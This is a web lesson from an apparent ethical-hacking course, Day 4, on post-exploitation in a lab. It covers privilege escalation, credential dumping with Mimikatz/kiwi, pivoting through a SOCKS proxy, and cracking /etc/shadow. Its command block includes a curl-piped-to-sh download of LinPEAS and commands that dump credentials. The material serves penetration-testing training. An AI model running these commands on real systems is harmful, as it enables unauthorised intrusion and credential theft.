HomeEthical Hacking in 5 DaysDay 4
Day 4 of 5
⏱ ~60 minutes
Ethical Hacking in 5 Days — Day 4

Post-Exploitation & Privilege Escalation

Getting a shell is step one. Post-exploitation determines what you can access and how far you can move through the network. Today covers privilege escalation, credential dumping, pivoting, and persistence — all documented for the final report.

Linux Privilege Escalation

A low-privilege shell is rarely enough. Look for SUID/SGID binaries, writable cron jobs, weak sudo rules, world-writable /etc/passwd, and kernel exploits. Tools like LinPEAS and Linux Smart Enumeration automate the search. GTFOBins documents how to escalate with specific binaries like find, vim, and python.

Windows Privilege Escalation

On Windows, check for unquoted service paths, weak service permissions, AlwaysInstallElevated registry keys, and token impersonation opportunities. WinPEAS, PowerUp, and Seatbelt automate enumeration. Meterpreter's 'getsystem' tries multiple escalation techniques automatically.

Lateral Movement & Pivoting

Once root or SYSTEM is obtained, extract credentials (Mimikatz on Windows, /etc/shadow on Linux) and use them to move to other machines. Port-forwarding and SOCKS proxies let you reach network segments that aren't directly accessible. Document every machine you touch — scope creep is a serious professional and legal issue.

bash
# Linux: find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Linux: check sudo permissions
sudo -l

# Run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Windows Meterpreter privilege escalation
meterpreter> getsystem
meterpreter> load kiwi
meterpreter> creds_all

# Pivot: set up SOCKS proxy via Meterpreter
meterpreter> run auxiliary/server/socks_proxy SRVPORT=1080 VERSION=5

# Linux password hashes
cat /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
💡
Use the principle of minimum necessary access. Only escalate privileges when required by your scope. Unnecessary escalation can damage systems and violates your Rules of Engagement.
📝 Day 4 Exercise
Escalate to Root on Linux
  1. On your Metasploitable shell, run LinPEAS and save the output to a file
  2. Identify the top 3 privilege escalation vectors LinPEAS highlights
  3. Find an SUID binary using GTFOBins and escalate to root with it
  4. Extract /etc/shadow and crack at least one password with John the Ripper
  5. Document the full kill chain from initial access to root in your mock report

Day 4 Summary

  • LinPEAS and WinPEAS automate privilege escalation enumeration
  • SUID binaries, sudo misconfigs, and weak services are common Linux escalation paths
  • Mimikatz and kiwi dump Windows credentials from memory
  • Pivoting lets you reach internal network segments through a compromised host
  • Document every action — post-exploitation notes feed directly into the report
Challenge

Compromise a second machine on your lab network using credentials extracted from the first. Show the full lateral movement path in a network diagram.

← Previous
Day 3: Exploitation Fundamentals
Next →
Day 5: Reporting & Remediation
Finished this lesson?